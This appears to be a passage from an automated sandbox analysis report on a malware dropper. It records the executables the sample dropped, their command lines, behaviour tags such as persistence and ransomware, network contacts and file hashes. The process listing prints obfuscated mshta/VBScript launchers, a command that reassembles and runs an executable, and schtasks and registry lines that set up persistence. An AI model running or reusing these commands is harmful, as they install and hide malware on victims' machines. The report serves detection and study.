PID 2556 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2556 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2556 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7.exe
PID 2556 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7.exe
PID 2556 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7.exe
PID 2556 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7.exe
PID 2556 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 2556 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 2556 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 2556 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 2556 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 2556 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 2556 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 2556 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 2556 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 2556 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 2556 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 2556 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 2556 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 2556 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 2556 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2556 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2556 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2556 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
PID 2556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
PID 2556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
PID 2556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
PID 2556 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
PID 2556 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
PID 2556 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
PID 2556 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
PID 2556 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe

"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe

"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"

C:\Users\Admin\AppData\Local\Temp\inst001.exe

"C:\Users\Admin\AppData\Local\Temp\inst001.exe"

C:\Users\Admin\AppData\Local\Temp\install.exe

"C:\Users\Admin\AppData\Local\Temp\install.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7.exe

"C:\Users\Admin\AppData\Local\Temp\7.exe"

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe

"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\lijun-game.exe

"C:\Users\Admin\AppData\Local\Temp\lijun-game.exe"

C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"

C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp" /SL5="$601CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe

"C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"

C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H5OR1.tmp\setup_2.tmp" /SL5="$601EE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\

C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE

..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u

C:\Windows\SysWOW64\taskkill.exe

taskkill -f /Im "sfx_123_206.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"

C:\Windows\SysWOW64\control.exe

control ..\kZ_AmsXL.6G

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 85C0DFAD51D9FC560EA58E8674CEF4C2 C

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1464

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\78224359952.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\96758969264.exe" /mix

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\83973314234.exe" /mix

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 1044

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\system32\taskeng.exe

taskeng.exe {966226A1-CBFB-44C8-97F7-47DE6F5BC114} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe

C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" AI_EUIMSI=1 APPDIR="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner" SECONDSEQUENCE="1" CLIENTPROCESSID="1044" CHAINERUIPROCESSID="1044Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature,RequiredApplication_1" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_PREREQFILES="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner%20Installation.exe" AI_PREREQDIRS="C:\Users\Admin\AppData\Roaming\Cleaner" AI_MISSING_PREREQS="Required Application" AI_DETECTED_INTERNET_CONNECTION="1" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733132187 " TARGETDIR="C:\" AI_INSTALL="1" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000584" "0000000000000528"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 2405DB814D59F3DF38C11B5F49434232

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe

C:\Users\Admin\AppData\Local\Temp\f7873aa.exe

"C:\Users\Admin\AppData\Local\Temp\f7873aa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 600

C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe

"C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 gcl-page.biz udp
US 8.8.8.8:53 t.gogamec.com udp
RU 185.215.113.25:80 185.215.113.25 tcp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 onepremiumstore.bar udp
US 8.8.8.8:53 premium-s0ftwar3875.bar udp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 mas.to udp
UA 194.145.227.161:80 194.145.227.161 tcp
US 104.21.11.154:443 mas.to tcp
US 8.8.8.8:53 abgtt.com udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:80 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 paybiz.herokuapp.com udp
US 54.208.186.182:443 paybiz.herokuapp.com tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 ocsp.r2m03.amazontrust.com udp
DE 13.224.191.223:80 ocsp.r2m03.amazontrust.com tcp
US 104.26.2.46:443 iplogger.org tcp
US 54.208.186.182:443 paybiz.herokuapp.com tcp
US 8.8.8.8:53 s3.us-central-1.wasabisys.com udp
US 38.91.42.102:443 s3.us-central-1.wasabisys.com tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 paybiz.herokuapp.com udp
US 34.201.81.34:443 paybiz.herokuapp.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 54.208.186.182:443 paybiz.herokuapp.com tcp
US 72.84.118.132:8080 tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 72.84.118.132:8080 tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp

Files

memory/2556-0-0x000000007403E000-0x000000007403F000-memory.dmp

memory/2556-1-0x0000000000970000-0x00000000010FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

MD5 93460c75de91c3601b4a47d2b99d8f94
SHA1 f2e959a3291ef579ae254953e62d098fe4557572
SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

\Users\Admin\AppData\Local\Temp\Firstoffer.exe

MD5 568eaf0936546f3a4d478f0c249a68ff
SHA1 9e1a778d77d10955e7dc5af123c26e839b253838
SHA256 623f08634b1a481b993c2c222f9cf1c87332d946ec7ebc6e2a49ea580f3502de
SHA512 ffc5d1b53dbd7deaeded67a78810b9ffe2bf6a08307f79f0430cb9c4abc5df55fe01f35d33ec3d84b51de3e4bfed3e387eddc38198c0eaf34115edfacaaf98a9

memory/2524-17-0x000007FEF5E73000-0x000007FEF5E74000-memory.dmp

memory/2524-20-0x000000013F9F0000-0x000000013FA00000-memory.dmp

\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe

MD5 72f96cfde8a3c2abd3f38d8da2cfe889
SHA1 72bbf2efd229601d52cce10cfd34fa4229520291
SHA256 5b1568f481160da68223eeddcc201b3b0d03b9dddc85e4494e92ee6e919ce10d
SHA512 36e01f7216d9a5140c28350f95e7bffbfdb57d6a9b00b1e3df88587da9fcd772ac64edf021875e284039e21aaefaf7ec3595899cacfc8396933997e19fd734b9

memory/3064-27-0x0000000000240000-0x0000000000258000-memory.dmp

memory/3064-30-0x0000000000270000-0x0000000000276000-memory.dmp

\Users\Admin\AppData\Local\Temp\inst001.exe

MD5 23bcdc132d1f2aaf8d248b6a5bd21801
SHA1 2153acec77f4a57c621a3e38d523eb6df9b29134
SHA256 a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b
SHA512 d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db

\Users\Admin\AppData\Local\Temp\install.exe

MD5 28fc3ef97675adb779a68c89e098e7ba
SHA1 4c8e04317d41426963a310230adb77c7c5ad67fd
SHA256 06fe5043a987831fcb4bb914b6bc939740f363f920d5145f3cd697a300e1c64d
SHA512 9355b28f9ce31da2afa2b5676b52032b92c5201c09cd506eadf89c9237f6114c13c0e0cac1fa65fff1ca6cf3c4165bbc148f1a13494ab3d59ba90fea354766ec

memory/1640-39-0x00000000009F0000-0x0000000000AF0000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 90cfe790d93388738929453e0b8a976e
SHA1 0b8dd0ae4070259991b0de105ec3390afbb2fb44
SHA256 2ded24319d6e74ee1b9ad2517fbfd1ceceeca9b854d34b722481cbc694270831
SHA512 2a9b0fd6a3fe152f8cd5cb02703be679918949a9bbc86f90cd4cdb8bd68cee716561a80541a4620a20f034d04eef8e5ec9edae2c1969c45ab1fd03fc616e7162

\Users\Admin\AppData\Local\Temp\7.exe

MD5 6a16fdad888507df0b938dd3421cc7cf
SHA1 d60d3a5959349f1df9e83292003e547828535ea3
SHA256 1bad2fb46b08904f12a4ea96ce3cf0582f9995c16a26143c16b858702793e166
SHA512 c6877e5b5b58730e188b441a67099605d2c6ae5dd94b2a0281534771555a09d144f952878e4ade462f33604e96a7f66dab5f18689b72d4ff589952784e1f9e16

memory/2868-65-0x00000000009B0000-0x00000000009B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe

MD5 f39dd2806d71830979a3110eb9a0ae44
SHA1 fd94b99664d85eede48ab22f27054ab5cc6dd2d3
SHA256 c5763dba038b94970b85fd0a078bcb1977e3973c56780e76b443915a9c30e213
SHA512 ffc5a57fa4982a425e1bb2077affba0113d92365ad6eae849e9d700ee99615128c965de3705d2f2a12c1b46230ef2fc1820e4b74b8a3938b1b7211a228db9e82

\Users\Admin\AppData\Local\Temp\setup_2.exe

MD5 662af94a73a6350daea7dcbe5c8dfd38
SHA1 7ab3ddd6e3cf8aaa7fa2c4fa7856bb83ea6a442c
SHA256 df0b82e8877857057a9b64b73281099f723ae74b1353cf216ca11ba6b20b3ef8
SHA512 d864c483bfb74479c90ea38a46fe6cd3d628a8b13bd38acde4ccce3258ec290e5389fe920a4351dadb7fd23f87cd461ecf253c5d926f8277e518a7b5029f583a

memory/1724-80-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\lijun-game.exe

MD5 fce1bf8a528a6f3cd7fbfe8c5360bffb
SHA1 1d5a8cba2fe37249f08154f4de532f2b2703fbfd
SHA256 61f6aaf51880570891d51f241af185edfa7ae118b4c4d2ddba4ed12f314db69c
SHA512 a5d559e62289c60348991ff1f8c9663b4e339bf8359bdb2b981824635ee0a475c31c6c5d84d38a9565ec609abe4243d963cccaf435091d1ed55c40498bed990a

\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe

MD5 3d9122fa1978d737354a61b3b4fc2c1b
SHA1 955f39ab127baa0c5fd23a1724293b52ce48e10e
SHA256 90abe563deabe721caffa1a0297eb3e1ab5fdad2a4e8e0dba26764f169062e1e
SHA512 f4f994ac1b5c2c9634fd3da58a1d993154eb2ed573bbc127466b90996970cf245453a9dd2d6ba642fbfae7bc7b7f2e8ff1671c0b7a638bd1a9afb54fb2b42d7a

\Users\Admin\AppData\Local\Temp\is-N0CCE.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

MD5 e4ff121d36dff8e94df4e718ecd84aff
SHA1 b84af5dae944bbf34d289d7616d2fef09dab26b7
SHA256 2a019bc6bace686b08286ee7d8e2e66c18283b162d27774c486037c940dc60cc
SHA512 141f12468cfe737b3694a4ece8f17c5d35bbade05ee0538fe4ef4fccf61584374f79a474fd4bf82685a4840afd94e9a9bbd9c9f357cb342dda9f89109c4da5f4

memory/2092-123-0x0000000000E90000-0x0000000000E98000-memory.dmp

memory/1040-138-0x0000000000400000-0x0000000000414000-memory.dmp

